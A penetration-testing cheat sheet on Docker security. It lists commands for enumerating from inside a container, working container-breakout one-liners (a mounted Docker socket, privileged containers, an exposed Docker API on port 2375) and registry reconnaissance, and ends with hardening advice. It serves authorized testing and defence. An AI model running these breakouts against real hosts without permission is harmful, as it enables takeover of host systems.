โ† All cheat sheets

DOCKER-SECURITY

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Container enumeration, breakout detection and misconfiguration abuse for
authorized engagements. Also useful for hardening review.

AM I IN A CONTAINER?#

    cat /proc/1/cgroup | grep -i docker
    ls -la /.dockerenv                     # present in most containers
    cat /proc/self/status | grep Cap       # capability bitmask
    systemd-detect-virt -c                 # container type

ENUMERATION FROM INSIDE#

    id; cat /etc/os-release
    env                                    # secrets often leak here
    cat /proc/self/status                  # CapEff / CapBnd
    mount                                  # look for host mounts
    ls -la /var/run/docker.sock            # exposed socket = game over
    capsh --print                          # decode capabilities

DANGEROUS EXPOSURES -> BREAKOUT#

  Mounted Docker socket (/var/run/docker.sock):
    # Full host control: spawn a privileged container mounting host /
    docker -H unix:///var/run/docker.sock run -v /:/host -it alpine \
      chroot /host sh

  --privileged container:
    # Mount the host disk device and chroot in
    fdisk -l
    mount /dev/sda1 /mnt && chroot /mnt

  CAP_SYS_ADMIN + no seccomp (cgroup release_agent classic):
    # Notify_on_release / release_agent host command execution.
    # Modern kernels/runtimes mitigate; test in scope, document impact.

  Host namespaces:
    --pid=host   -> see & signal host processes
    --net=host   -> access host loopback services

EXPOSED DOCKER API (2375/2376)#

    docker -H tcp://TARGET:2375 version
    docker -H tcp://TARGET:2375 ps
    docker -H tcp://TARGET:2375 run -v /:/host -it alpine chroot /host sh

IMAGE & REGISTRY RECON#

    docker history --no-trunc <image>       # leaked secrets in layers
    dive <image>                            # inspect layers interactively
    trivy image <image>                     # vuln + secret scan
    # Anonymous registry pull test
    curl -s http://REGISTRY:5000/v2/_catalog
    curl -s http://REGISTRY:5000/v2/<repo>/tags/list

TOOLING#

    deepce            # Docker Enumeration & Escalation
    cdk               # container penetration toolkit
    amicontained      # capability / seccomp / namespace check
    trivy / grype     # image vulnerability scanning
    dockle            # image config linter

HARDENING NOTES (blue side)#

  - Never mount the Docker socket into a container.
  - Run rootless; drop all caps, add only what's needed.
  - Read-only root FS, no-new-privileges, seccomp + AppArmor.
  - Do not expose the Docker API over TCP without mTLS.
  - Scan images in CI; pin digests; minimal base images.

  See also: KUBERNETES-PENTEST, IAC-SECURITY, LINPEAS, EVASION-TECHNIQUES.